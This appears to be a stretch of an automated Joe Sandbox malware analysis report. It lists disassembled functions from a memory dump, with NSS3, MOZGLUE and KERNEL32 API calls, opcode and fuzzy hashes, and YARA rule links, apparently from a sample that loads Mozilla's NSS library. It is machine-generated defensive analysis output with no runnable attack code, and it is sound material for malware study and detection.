Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: 5F31BBB6900209ABDF205E64DF4DAAA3765BF4521DF140130ED259BB91E732E918C7B2

Function 6C706C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C706C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C706CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C706CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C828FE0), ref: 6C706CFE

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: b2c500e6563c5aaa55c3d74c2843a04c2b1880819d9ab8c088b3982e5c1b1007
Instruction ID: 00a368b289f08da3bcb8f152c4185e5c729c29dd27104a85c629bc6fffd401bc
Opcode Fuzzy Hash: b2c500e6563c5aaa55c3d74c2843a04c2b1880819d9ab8c088b3982e5c1b1007
Instruction Fuzzy Hash: 9F318EB1A002169FEB08CF65C995ABFBBF5EF85248B10443DDD05E7700EB31AA45CBA0

Function 6C814F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C814F5D
free.MOZGLUE(?), ref: 6C814F74
free.MOZGLUE(?), ref: 6C814F82
GetLastError.KERNEL32 ref: 6C814F90

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: c6baaaadddb1e1125e9e5f4dfdc33ead077202b80591fec23e00d6479125a6eb
Instruction ID: b66ea65f31ac5f80bb7be7deffb106159c1adda9a9ab2eb2bdaba2d30acd3df5
Opcode Fuzzy Hash: c6baaaadddb1e1125e9e5f4dfdc33ead077202b80591fec23e00d6479125a6eb
Instruction Fuzzy Hash: 493137B5A0420A4BEB11CB69DD81BDBB3F8EFC534CF040629E815A7B81D734E904CAA1

Function 6C776DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C776E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C776E57

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C776E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C776EAA

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: 81a58aa29b5ca475441338c4adfd497f4d78b0ae5f21fdd978ebea4fc9afff56
Instruction ID: 19f7109fec0b0072e1f7ee7962cf35497f23ead6397276746cfbe5e5d4193415
Opcode Fuzzy Hash: 81a58aa29b5ca475441338c4adfd497f4d78b0ae5f21fdd978ebea4fc9afff56
Instruction Fuzzy Hash: 8431D73161061AEFDF241F34DE08396B7A9BB0131AF14063CD499D6A49E7B0A654CFB2

Function 6C772880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

NSS_CMSEncoder_Finish.NSS3(?), ref: 6C772896
NSS_CMSEncoder_Finish.NSS3(?), ref: 6C772932
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C77294C
free.MOZGLUE(?), ref: 6C772955

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Encoder_Finish$Arena_FreeUtilfree
String ID:
API String ID: 508480814-0
Opcode ID: bc6d9d0c0907a712388da285b5674b86f136d8d19929c8a349920f4af71e7cb8
Instruction ID: 849968fc3476ec358fd8bbd768ebab3361ae24f429bc3bc105b0146c03e50988
Opcode Fuzzy Hash: bc6d9d0c0907a712388da285b5674b86f136d8d19929c8a349920f4af71e7cb8
Instruction Fuzzy Hash: 4321B5B5600604DBEB308B26DE0DF477BE9EF84358F08453CE49987A61FB32E4188A61

Function 6C744FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C74B60F,00000000), ref: 6C745003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C74B60F,00000000), ref: 6C74501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C74B60F,00000000), ref: 6C74504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C74B60F,00000000), ref: 6C745064

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 29d8fae72be00c07125ec53fcf891da571a98a98a10259ff909fb3eb347269a5
Instruction ID: 5d3e0ccf91606a746cad4d550895313b6f708e398cad355626fd7ba7ae64c809
Opcode Fuzzy Hash: 29d8fae72be00c07125ec53fcf891da571a98a98a10259ff909fb3eb347269a5
Instruction Fuzzy Hash: 1F3127B4A056068FDB80EF78D58456ABBF4FF09308B158579D85997711E730E890CBD1

Function 6C780C00 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

PK11_DigestOp.NSS3(?,?,00000004), ref: 6C780C43

Part of subcall function 6C72DEF0: TlsGetValue.KERNEL32 ref: 6C72DF37
Part of subcall function 6C72DEF0: EnterCriticalSection.KERNEL32(?), ref: 6C72DF4B
Part of subcall function 6C72DEF0: PR_SetError.NSS3(00000000,00000000), ref: 6C72E02B
Part of subcall function 6C72DEF0: PR_Unlock.NSS3(?), ref: 6C72E07E

PK11_DigestOp.NSS3(?,?,00000008), ref: 6C780C85
PK11_DigestOp.NSS3(?,?,?), ref: 6C780C9F
PR_SetError.NSS3(FFFFD07F,00000000), ref: 6C780CB4

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: DigestK11_$Error$CriticalEnterSectionUnlockValue
String ID:
API String ID: 3186484790-0
Opcode ID: 01cfdfb3f39a7892734357e477d1125bbcf913928eadd38a5db09f771b6303a6
Instruction ID: f1cee0ffbf9d7e4c42ce34bbb6e39851358f4709caa6caa1c1f4b4bcb61e1082
Opcode Fuzzy Hash: 01cfdfb3f39a7892734357e477d1125bbcf913928eadd38a5db09f771b6303a6
Instruction Fuzzy Hash: 4A212871A052869FCB01CF689D09BDABBA4AF25204F0D81B5E9485F752E731D828C7E6

Function 6C772DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C772E08

Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C772E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C772E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C772E95

Part of subcall function 6C761200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7088A4,00000000,00000000), ref: 6C761228
Part of subcall function 6C761200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C761238
Part of subcall function 6C761200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7088A4,00000000,00000000), ref: 6C76124B
Part of subcall function 6C761200: PR_CallOnce.NSS3(6C862AA4,6C7612D0,00000000,00000000,00000000,?,6C7088A4,00000000,00000000), ref: 6C76125D
Part of subcall function 6C761200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C76126F
Part of subcall function 6C761200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C761280
Part of subcall function 6C761200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C76128E
Part of subcall function 6C761200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C76129A
Part of subcall function 6C761200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7612A1

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 5f42288251e9cbd0d7e6edb922e2e58cdc5a7b628e7aa61067f8e0d67881069a
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 7D21D7B1E003498BEB10CF559E4CBAA37686F9130CF111279DD189B752F7F1E594C2A2

Function 6C792870 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C798915
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C798920
free.MOZGLUE(?), ref: 6C798929
free.MOZGLUE(?,-00000001,?,?,?,6C780279,?), ref: 6C798942

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Destroyfree$PrivatePublic
String ID:
API String ID: 4267951533-0
Opcode ID: 0351ca47efc754ff7d3aecb8875febd895c56863f208248baeaa13979c14dd4c
Instruction ID: da41802d58a2830ee1da22e7608e160da320ec9c3628f1543af30e381bef567a
Opcode Fuzzy Hash: 0351ca47efc754ff7d3aecb8875febd895c56863f208248baeaa13979c14dd4c
Instruction Fuzzy Hash: E121A475605100DFC705DF09E989EA63BB5EF4A368F0840BAE9099B712C731A801CBA5

Function 6C7069B0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(6C706AB7,0000000C,00000001,00000000,?,?,6C706AB7,?,00000000,?), ref: 6C7069CE

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

SEC_ASN1EncodeItem_Util.NSS3(6C706AB7,0000001C,00000004,?,00000001,00000000), ref: 6C706A06
SEC_ASN1EncodeItem_Util.NSS3(6C706AB7,?,00000000,?,00000001,00000000,?,?,6C706AB7,?,00000000,?), ref: 6C706A2D
PR_SetError.NSS3(FFFFE005,00000000,00000001,00000000,?,?,6C706AB7,?,00000000,?), ref: 6C706A42

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$ArenaEncodeItem_Value$Alloc_AllocateCriticalEnterErrorSectionUnlock
String ID:
API String ID: 4031546487-0
Opcode ID: 9dee3c213ffd979a64a8f3fa99931bc085ea89c10b96135053b0a6cb6b3081b2
Instruction ID: 9bb0ea0a0ebfa0761b99ddaff8ab43011210c7f34e59a151c4d0490135ab9565
Opcode Fuzzy Hash: 9dee3c213ffd979a64a8f3fa99931bc085ea89c10b96135053b0a6cb6b3081b2
Instruction Fuzzy Hash: 8011E2F17802016FE710AE25CE99B5273ECFB4021CF548538EE19C3A01E770E694C7A0

Function 6C72ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C72ACC2

Part of subcall function 6C702F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C702F0A
Part of subcall function 6C702F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C702F1D

Part of subcall function 6C702AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C700A1B,00000000), ref: 6C702AF0
Part of subcall function 6C702AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C702B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C72AD5E

Part of subcall function 6C7457D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C70B41E,00000000,00000000,?,00000000,?,6C70B41E,00000000,00000000,00000001,?), ref: 6C7457E0
Part of subcall function 6C7457D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C745843

CERT_DestroyCertList.NSS3(?), ref: 6C72AD36

Part of subcall function 6C702F50: CERT_DestroyCertificate.NSS3(?), ref: 6C702F65
Part of subcall function 6C702F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C702F83

free.MOZGLUE(?), ref: 6C72AD4F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: ddddfa22a30ac31470ce1ea5c4929861c7aa0189b717c5cd17d969e0349ffccf
Instruction ID: 9520977ef3dcfdf1ad9803b8e3fd5775f442a46a7a3f5c03bb3438c4a6ac5e05
Opcode Fuzzy Hash: ddddfa22a30ac31470ce1ea5c4929861c7aa0189b717c5cd17d969e0349ffccf
Instruction Fuzzy Hash: B121C3B2D002148BEB10DF64EA0A5EEB7F4EF05258F454078D814BB700FB35AA49CBE1

Function 6C753C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C753C9E
EnterCriticalSection.KERNEL32(?), ref: 6C753CAE
PR_Unlock.NSS3(?), ref: 6C753CEA
PR_SetError.NSS3(00000000,00000000), ref: 6C753D02

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 528fea61e8485242f3efeb0b2a8c2e2485813f1db6f0953c6489138e326413bf
Instruction ID: db6035457992bd9ceb12707c770c8bcaf753f7160638dc5c48d2b8eb75df9f7d
Opcode Fuzzy Hash: 528fea61e8485242f3efeb0b2a8c2e2485813f1db6f0953c6489138e326413bf
Instruction Fuzzy Hash: 0811D379A00214AFDB40EF24DD49A9A3778EF09368F954570EC088B722EB31ED55CBE1

Function 6C75ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C75F0AD,6C75F150,?,6C75F150,?,?,?), ref: 6C75ECBA

Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C75ECD1

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C75ED02

Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C75ED5A

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: a9c1e98a834629811c2e4f4e729b64d3cc58b314cf105c727ad75def7ea2292c
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: D621A4B1E007465BE700CF26DA49B52B7E4BFA4348F15C226E81C87A61EB70E5A4C7D0

Function 6C78ED10 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C78ED34
realloc.MOZGLUE(?,?), ref: 6C78ED5D
PORT_Alloc_Util.NSS3(?), ref: 6C78ED74

Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15

memset.VCRUNTIME140(?,?,?), ref: 6C78ED97

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemsetrealloc
String ID:
API String ID: 2992043971-0
Opcode ID: 3f4d70b1b94dff9973c5d753c062071b1a50b8bc1174f02d2e8549e59723d269
Instruction ID: 14b33f1cc7bf0092f8f7348a7e50edc690a36d9ba0b9b000c8dcfe0a3441acfb
Opcode Fuzzy Hash: 3f4d70b1b94dff9973c5d753c062071b1a50b8bc1174f02d2e8549e59723d269
Instruction Fuzzy Hash: 431106B860671A6BE7109E25CD85B56B3A8EF0035DF244935EE1982B41E330E468C7F1

Function 6C72C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6C72C890

Part of subcall function 6C728F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C728FAF
Part of subcall function 6C728F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C728FD1
Part of subcall function 6C728F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C728FFA
Part of subcall function 6C728F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C729013
Part of subcall function 6C728F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C729042
Part of subcall function 6C728F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C72905A
